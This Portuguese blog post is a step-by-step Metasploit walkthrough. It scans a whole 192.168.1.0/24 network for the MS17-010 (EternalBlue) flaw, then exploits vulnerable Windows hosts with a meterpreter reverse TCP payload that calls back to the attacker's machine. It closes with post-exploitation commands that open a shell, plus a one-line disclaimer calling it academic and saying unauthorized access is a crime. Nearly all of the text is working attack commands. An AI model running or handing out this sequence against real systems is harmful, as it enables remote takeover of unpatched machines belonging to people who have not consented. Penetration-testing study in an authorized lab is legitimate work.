Varredura na Rede (para detectar o eternalblue)

Olá para darmos continuidade ao ano de 2020, hoje vou demostrar a varredura em sua Rede para detectar o eternalblue.


A premissa que vou considerar que você já tem em seu virtualbox é um kali linux atualizado
https://www.kali.org/downloads/



Comandos dentro do Kali Linux
# service postgresql start

# msfconsole
msf5 > search smb_ms17_010
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.0/24
msf5 auxiliary(scanner/smb/smb_ms17_010) > set THREADS 100
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

Quando a vulnerabilidade for identificada teremos a saida
"Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x86"

msf5 auxiliary(scanner/smb/smb_ms17_010) > back
msf5 > search ms17_010_eternalblue
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 10.0.2.15
msf5 exploit(windows/smb/ms17_010_eternalblue) > show missing
msf5 exploit(windows/smb/ms17_010_eternalblue) > run

Pos invasão
sysinfo
getuid
shell

E por ai vai...

Lembrando que esse conteúdo serve apenas para fins acadêmicos, toda e qualquer acesso informático sem autorização É CRIME!!!

Comentários

Postagens mais visitadas deste blog

Instalando e Atualizando GLPI no Debian Jessie (8.7.1)